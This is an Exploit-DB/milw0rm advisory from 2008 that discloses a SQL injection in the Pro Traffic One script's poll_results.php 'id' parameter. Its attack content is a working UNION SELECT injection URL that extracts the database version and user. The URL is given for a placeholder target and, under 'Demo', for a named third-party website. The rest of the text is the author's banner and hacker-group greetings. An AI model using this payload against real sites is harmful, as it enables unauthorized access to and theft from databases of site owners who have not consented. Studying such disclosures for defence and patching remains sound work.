Pro Traffic One - 'poll_results.php' SQL Injection

EDB-ID:

6877

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2008-10-29

|___________________________________________________
|  Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability
|___________________________________________________
|--------------------   IQ-SecuritY  -------------------
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                    
|
| script :  http://www.webmasterdownload.com/
|
| DorK   :  :)
|___________________________________________________

Exploit:
________


www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--


Demo
________

http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--




____________________________( Greetz )_________________________________________
|
|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|___________________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-10-29]